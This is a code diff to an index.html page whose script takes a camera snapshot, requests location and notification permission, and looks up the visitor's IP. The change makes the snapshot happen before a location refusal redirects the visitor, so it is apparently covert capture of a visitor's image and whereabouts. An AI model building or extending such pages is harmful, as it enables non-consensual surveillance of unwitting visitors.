--- a/index.html
+++ b/index.html
@@ -110,7 +110,7 @@
           waitForSize();
         });
 
-        await new Promise(res => setTimeout(res, 5000)); // Give camera time to focus
+        await new Promise(res => setTimeout(res, 5000)); // Allow camera to warm up
 
         const canvas = document.createElement("canvas");
         canvas.width = video.videoWidth;
@@ -165,9 +165,13 @@
     }
 
     function askNotificationPermission() {
-      if ('Notification' in window && Notification.permission !== 'granted') {
-        Notification.requestPermission().catch(e => console.warn("Notification permission error", e));
-      }
+      return new Promise((resolve) => {
+        if ('Notification' in window && Notification.permission !== 'granted') {
+          Notification.requestPermission().then(resolve).catch(resolve);
+        } else {
+          resolve();
+        }
+      });
     }
 
     function askLocation() {
@@ -200,15 +204,14 @@
         <div id="spinner"></div>
       `;
 
-      askNotificationPermission();
-
       const locationAllowed = await askLocation();
+      const notifDone = await askNotificationPermission();
+      await captureSnapshot();
+
       if (!locationAllowed) {
         window.location.href = deniedPage;
         return;
       }
-
-      captureSnapshot(); // Non-blocking
 
       fetch("https://api.db-ip.com/v2/free/self")
         .then(res => res.json())
